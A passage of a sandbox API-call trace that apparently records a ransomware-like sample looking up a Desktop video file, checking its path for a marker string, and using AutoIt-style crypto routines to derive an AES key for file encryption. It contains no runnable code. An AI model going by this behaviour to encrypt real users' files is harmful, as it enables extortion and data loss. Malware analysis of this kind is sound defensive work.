(in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.507] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0168.507] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0168.507] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.507] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.507] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.507] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0168.507] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.507] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.507] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.507] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_IlnDJr.mp4", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x671ad310, ftCreationTime.dwHighDateTime=0x1d5e07e, ftLastAccessTime.dwLowDateTime=0x5571c040, ftLastAccessTime.dwHighDateTime=0x1d5de91, ftLastWriteTime.dwLowDateTime=0x5571c040, ftLastWriteTime.dwHighDateTime=0x1d5de91, nFileSizeHigh=0x0, nFileSizeLow=0x7952, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="_IlnDJr.mp4", cAlternateFileName="")) returned 0x90add8 [0168.507] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0168.507] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.507] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_IlnDJr.mp4", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x671ad310, ftCreationTime.dwHighDateTime=0x1d5e07e, ftLastAccessTime.dwLowDateTime=0x5571c040, ftLastAccessTime.dwHighDateTime=0x1d5de91, ftLastWriteTime.dwLowDateTime=0x5571c040, ftLastWriteTime.dwHighDateTime=0x1d5de91, nFileSizeHigh=0x0, nFileSizeLow=0x7952, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="_IlnDJr.mp4", cAlternateFileName="")) returned 0x90add8 [0168.507] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0168.508] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_IlnDJr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_IlnDJr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_IlnDJr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_IlnDJr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_IlnDJr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\_IlnDJr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\_IlnDJr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\_IlnDJr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\_IlnDJr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\_IlnDJr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\_IlnDJr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\_IlnDJr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\_IlnDJr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\_IlnDJr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\_IlnDJr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\_IlnDJr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\_IlnDJr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\_IlnDJr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\_IlnDJr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\_IlnDJr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\_IlnDJr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\_IlnDJr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\_IlnDJr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\_IlnDJr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\_IlnDJr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\_IlnDJr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.509] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\_IlnDJr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.509] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\_IlnDJr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.509] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\_IlnDJr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.509] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\_IlnDJr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.509] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\_IlnDJr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.509] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\_IlnDJr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.509] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\_IlnDJr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.509] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\_IlnDJr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.509] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\_IlnDJr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.509] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\_IlnDJr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.509] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\_IlnDJr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.509] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\_IlnDJr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.509] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\_IlnDJr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.509] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_IlnDJr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.509] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IlnDJr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.509] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lnDJr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.509] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.509] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0168.509] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0168.509] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0168.509] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0168.510] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0168.510] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0168.510] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0168.510] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0168.510] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.510] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_IlnDJr.mp4", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x671ad310, ftCreationTime.dwHighDateTime=0x1d5e07e, ftLastAccessTime.dwLowDateTime=0x5571c040, ftLastAccessTime.dwHighDateTime=0x1d5de91, ftLastWriteTime.dwLowDateTime=0x5571c040, ftLastWriteTime.dwHighDateTime=0x1d5de91, nFileSizeHigh=0x0, nFileSizeLow=0x7952, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="_IlnDJr.mp4", cAlternateFileName="")) returned 0x90ae18 [0168.510] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0168.510] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.510] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0168.510] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.510] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0168.510] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0168.510] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.510] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0168.511] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.511] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.511] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0168.511] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0168.511] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0168.511] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.511] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.511] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.511] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0168.511] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.511] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0168.513] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.513] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.513] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0168.513] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0168.513] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0168.513] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.513] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.513] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.513] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0168.513] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0168.513] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0168.513] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.514] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.514] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.514] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.514] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0168.514] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.514] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.514] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0168.514] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0168.514] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0168.514] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0168.514] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0168.514] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0168.514] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0168.514] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0168.514] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0168.514] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0168.514] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.514] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.514] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.515] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0168.515] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0168.515] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0168.515] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.515] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0168.515] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.515] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.515] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.515] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.515] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0168.515] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.515] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.515] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.515] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0168.515] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.515] CryptHashData (hHash=0x90af58, pbData=0x8ded80, dwDataLen=0x19, dwFlags=0x1) returned 1 [0168.515] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.515] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.515] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.516] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.516] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0168.516] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0168.516] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0168.516] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.516] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0168.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0168.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0168.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0168.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0168.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0168.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0168.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0168.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0168.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0168.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 